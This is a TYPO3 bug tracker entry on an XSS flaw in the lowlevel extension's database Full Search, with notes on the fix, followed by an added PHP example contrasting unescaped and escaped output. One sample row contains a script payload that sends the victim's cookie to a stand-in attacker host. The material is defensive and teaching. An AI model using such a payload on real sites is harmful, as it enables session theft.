Bug #21333

Sysext:lowlevel (function "DB>Full search") susceptible to XSS

Added by Ernesto Baschny about 10 years ago. Updated over 9 years ago.

Status:
Closed
Priority:
Should have
Category:
-
Target version:
-
Start date:
2009-10-22
Due date:
% Done:

0%

TYPO3 Version:
4.2
PHP Version:
4.3
Tags:
Complexity:
Is Regression:
Sprint Focus:

Description

Sysext:lowlevel provides, amongst others, a function called "Full Search" that allows querying the database directly. Both sub-functions, "raw search in all fields" and "advanced query", are susceptible to XSS because both modules output the query results without sanitizing them.

Reported by Markus Krause

Security Team OTRS reference: 2009091210000033
(issue imported from #M12308)
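The pattern behind this report, as an added illustration that is not TYPO3's own code: a search page that echoes database cell contents straight into its result table, beside the output-escaped rendering that a fix of this class amounts to. The sample rows, the function names and the payload are constructed for the example; none of it is taken from the lowlevel module.

```php
<?php
// Added example, not TYPO3 code. Shows why a DB search page that prints
// result values unescaped is a stored-XSS sink: the payload enters the
// database through any ordinary write path (a form, an import, another
// editor) and executes in the session of whoever later runs a search.

// Constructed sample rows standing in for a query result. The <script>
// in the second row is the kind of stored payload the report is about.
$rows = [
    ['uid' => 1, 'title' => 'Welcome page', 'author' => 'editor'],
    ['uid' => 2,
     'title' => '<script>document.location="https://attacker.invalid/?c="+document.cookie</script>',
     'author' => 'guest'],
];

// Vulnerable rendering (hypothetical): cell values are concatenated into
// HTML as-is, so the script in row 2 runs in the backend user's browser.
function renderResultsUnsafe(array $rows): string {
    $html = '<table>';
    foreach ($rows as $row) {
        $html .= '<tr>';
        foreach ($row as $value) {
            $html .= '<td>' . $value . '</td>';
        }
        $html .= '</tr>';
    }
    return $html . '</table>';
}

// Hardened rendering: every cell passes through htmlspecialchars() with
// ENT_QUOTES, so <, >, &, " and ' are neutralised whether the value ends
// up in element content or in an attribute. Escaping happens at output
// time, not on the way into the database: the stored value is legitimately
// raw data, and the same row may be rendered in non-HTML contexts.
function renderResultsEscaped(array $rows): string {
    $html = '<table>';
    foreach ($rows as $row) {
        $html .= '<tr>';
        foreach ($row as $value) {
            $html .= '<td>' . htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8') . '</td>';
        }
        $html .= '</tr>';
    }
    return $html . '</table>';
}

// Self-check: the unsafe output still contains a live script element,
// the escaped output contains only its entity-encoded form.
$unsafe  = renderResultsUnsafe($rows);
$escaped = renderResultsEscaped($rows);
assert(strpos($unsafe, '<script>') !== false);
assert(strpos($escaped, '<script>') === false);
assert(strpos($escaped, '&lt;script&gt;') !== false);

echo $escaped, PHP_EOL;
```

Run it with `php -d zend.assertions=1 example.php` so the `assert()` calls are evaluated. The point to carry over to a real search module is that the escaping has to cover every value taken from the result set, including column and table names the module reflects back from an "advanced query" form, because an attacker only needs one field that reaches the page unescaped.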

History

#1 Updated by Ernesto Baschny about 10 years ago

Committed to:
TYPO3_4-2 (rev.6247 = 4.2.10)
TYPO3_4-1 (rev.6248 = 4.1.11)

Note that trunk (4.3) is not affected.
